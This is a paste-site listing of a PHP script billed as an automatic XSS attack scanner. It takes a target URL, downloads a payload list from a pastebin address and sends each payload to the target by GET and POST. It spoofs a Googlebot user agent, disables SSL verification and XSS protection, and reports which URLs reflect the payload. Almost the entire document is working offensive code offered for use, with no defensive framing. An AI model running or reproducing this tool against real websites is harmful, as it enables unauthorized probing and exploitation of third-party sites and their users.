Auto XSS Scanner

SUBMITTED BY: mgalarm
DATE: Aug. 21, 2016, 3:01 p.m.
FORMAT: Text only
SIZE: 3.6 kB
Raw Download
HITS: 520
Report
<?php
###########################################################
#XSS Cross Site Scripting Automatic Attack Scanner By H4T3D
#image >> http://i.imgur.com/pYJJZFi.png
#Changing Name Wont Make You L33T -_-
############################################################## 

header("X-XSS-Protection: 0");
set_time_limit(0);
?>
<link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
<style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
        
    }
	h1{    font-family: 'Orbitron', sans-serif; color: #fff;}
    div {
        width: 600px;
        margin: 5em auto;
        padding: 50px;
        //background-color: #fff;
	background-color: black;
        border-radius: 1em;
	word-wrap: break-word;
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        body {
            background-color: #fff;
        }
        div {
            width: auto;
            margin: 0 auto;
            border-radius: 0;
            padding: 1em;
        }
    }
    </style>
<div>
<center>
<h1>XSS Scanner -H4T3D</h1>
<p>
<form action="" method="POST">
<input type="text" name ="q" placeholder="www.example.com/?q="/>
<input type="submit" name="key" value="SCAN"/>
</form>
</p>
<?php
if(isset($_POST['key']))
{

$get=$_POST["q"];
$x=$get;
function scan($x,$payload){
	
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_URL,$x."".urlencode($payload));
        curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
        curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        curl_setopt($ch,CURLOPT_TIMEOUT,30);
        $data=curl_exec($ch);
	//echo $data;
        if(preg_match('/XSS/',$data)){
		 echo"\r\n<font color='#00FF00'>[!] Method POST Url >> <a href='$x?".urlencode($payload)."' target=\"_blank\">$x?".urlencode($payload)."</a></font></br>";
               // echo"\r\n<font color='#00FF00'>[!] Method GET Url >> $x?".urlencode($payload)."</font></br>";
		flush();@ob_flush();
                return true;
        }else{
                $ch=curl_init();
                curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                curl_setopt($ch,CURLOPT_URL,$x);
                curl_setopt($ch,CURLOPT_POST,1);
                curl_setopt($ch,CURLOPT_POSTFIELDS,"".urlencode($payload));
                curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
                curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
                curl_setopt($ch,CURLOPT_TIMEOUT,30);
                $data=curl_exec($ch);
                if(preg_match('/XSS/',$data)){
                        echo"\r\n<font color='#00FF00'>[!] Method POST Url >> <a href='$x?".urlencode($payload)."'>$x?".urlencode($payload)."</a></font></br>";
			flush();@ob_flush();
                        return true;
                }else{
			echo"<font color='#f3172d'>\r\n[!] NOT FOUND !!! </font></br>";
			flush();@ob_flush();
                        return false;
           		     }
      		  }
	}



$homepage = file_get_contents('http://pastebin.com/raw.php?i=mJcw4XsU');
        $payloader = explode("\n",$homepage);
	foreach($payloader as $payload) {
 	$payload = @trim($payload);
scan($x,$payload);

}


					}//end of post key

?>
</div>